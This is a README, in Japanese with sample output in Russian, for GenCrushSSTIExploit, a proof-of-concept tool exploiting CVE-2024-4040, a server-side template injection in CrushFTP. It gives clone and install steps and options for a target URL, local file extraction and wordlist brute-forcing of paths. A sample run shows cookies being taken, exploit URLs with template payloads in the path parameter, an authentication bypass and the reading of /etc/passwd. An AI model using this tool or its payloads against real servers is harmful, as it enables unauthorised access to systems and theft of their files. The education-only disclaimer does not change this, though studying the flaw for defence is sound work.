
CVE-2024-4040 の PoC であり、CrushFTP の SSTI 脆弱性を悪用するためのツールです。
GenCrushSSTIExploit は、CrushFTP の CVE-2024-4040 における SSTI(サーバーサイドテンプレートインジェクション)の脆弱性を標的とした PoC エクスプロイトツールです。このツールは、教育および倫理的ハッキング目的のみでこの脆弱性を悪用する方法を示します。
rich を使用して、美しくスタイルされたコンソール出力を実現します。⚠️ このツールは責任を持って使用してください!本ツールは研究および教育目的のみを対象としています。作者は、このツールの誤用またはそれによって生じた損害について一切の責任を負いません。
pip(Python パッケージインストーラー)git clone https://github.com/geniuszly/GenCrushSSTIExploit
cd GenCrushSSTIExploit
pip install -r requirements.txt
python GenCrushSSTIExploit.py -t <TARGET_URL>
-t / --target: 脆弱な CrushFTP サーバーのターゲット URL を指定します。-l / --lfi: ローカルファイルインクルージョン(Local File Inclusion)。抽出するファイルを指定します。-w / --wordlist: ファイルパスをブルートフォースするためのワードリストを指定します。python GenCrushSSTIExploit.py -t http://example.com -l /etc/passwd
★ Добро пожаловать в GenCrushSSTIExploit ★
CrushFTP SSTI PoC (CVE-2024-4040)
Автор: geniuszly
Использование: только для учебных и этических целей
--------------------------------------------------
[*] Подключение к ServerSessionAJAX...
[+] Успешно подключено к ServerSessionAJAX
[+] Куки CrushAuth: abc123def456ghi789
[+] Куки currentAuth: xyz987
[*] Попытка эксплуатации уязвимости SSTI...
[+] URL: http://example.com/WebInterface/function/?c2f=xyz987&command=zip&path={hostname}&names=/a
[+] Успешная эксплуатация уязвимости SSTI
[+] Ответ сервера: Hostname: example.com
[*] Попытка обхода аутентификации...
[+] URL: http://example.com/WebInterface/function/?c2f=xyz987&command=zip&path={working_dir}&names=/a
[+] Обход аутентификации успешен
[+] Извлечение /etc/passwd...
[+] Успешное извлечение /etc/passwd
[+] Извлеченное содержимое:
root:x:0:0:root:/root:/bin/bash
...